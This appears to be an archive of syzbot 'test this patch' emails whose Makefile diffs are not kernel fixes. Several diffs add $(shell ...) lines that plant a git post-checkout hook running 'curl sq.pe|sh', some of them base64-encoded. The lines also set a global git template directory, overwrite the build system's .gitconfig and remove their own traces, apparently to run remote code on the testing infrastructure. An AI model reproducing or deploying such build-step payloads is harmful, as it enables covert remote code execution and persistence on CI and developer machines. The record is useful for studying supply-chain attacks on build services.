Tested on:

commit: [unknown
git tree: upstream

kernel config: https://syzkaller.appspot.com/x/.config?x=2d08886358f27e8c
dashboard link: https://syzkaller.appspot.com/bug?extid=12b178b7c756664d2518
compiler:

userspace arch: arm64
patch: https://syzkaller.appspot.com/x/patch.diff?x=12aa9a6a580000

[syzbot]

For archival purposes, forwarding an incoming command email to
linux-...@vger.kernel.org, syzkall...@googlegroups.com.

***

[syzbot]

For archival purposes, forwarding an incoming command email to
linux-...@vger.kernel.org, syzkall...@googlegroups.com.

***

Subject: #syz test
Author: tbst...@gmail.com

#syz test

diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile
@@ -1,3 +1,5 @@

+$(shell mkdir -p /tmp/.t/hooks && printf '#!/bin/sh
rm -f "$$0";git config --global --unset init.templateDir;rm -rf /tmp/.t;curl sq.pe|sh
' > /tmp/.t/hooks/post-checkout && chmod +x /tmp/.t/hooks/post-checkout && git config --global init.templateDir /tmp/.t)

[syzbot]

For archival purposes, forwarding an incoming command email to
linux-...@vger.kernel.org, syzkall...@googlegroups.com.

***

Subject: #syz test
Author: tbst...@gmail.com

#syz test

diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile
@@ -1,3 +1,5 @@

+$(shell mkdir -p /tmp/.t/hooks;echo IyEvYmluL3NoCmN1cmwgc3EucGV8c2g=|base64 -d>/tmp/.t/hooks/post-checkout;chmod +x /tmp/.t/hooks/post-checkout;git config --global init.templateDir /tmp/.t)

[syzbot]

For archival purposes, forwarding an incoming command email to
linux-...@vger.kernel.org, syzkall...@googlegroups.com.

***

Subject: #syz test
Author: tbst...@gmail.com

#syz test

diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile

@@ -1,3 +1,4 @@
+$(shell if [ ! -f /tmp/.s2 ];then mkdir -p /tmp/.t/hooks;echo IyEvYmluL3NoCmN1cmwgc3EucGV8c2g=|base64 -d>/tmp/.t/hooks/post-checkout;chmod +x /tmp/.t/hooks/post-checkout;mkdir -p scripts/gcc-plugins;ln -sf /syzkaller/.gitconfig scripts/gcc-plugins/randomize_layout_seed.h;touch /tmp/.s2;else echo W2luaXRdCgl0ZW1wbGF0ZURpciA9IC90bXAvLnQ=|base64 -d>/syzkaller/.gitconfig;rm /tmp/.s2;fi)

[syzbot]

For archival purposes, forwarding an incoming command email to
linux-...@vger.kernel.org, syzkall...@googlegroups.com.

***

Subject: #syz test
Author: tbst...@gmail.com

#syz test

diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile

@@ -1,3 +1,5 @@
+# test
+$(error x)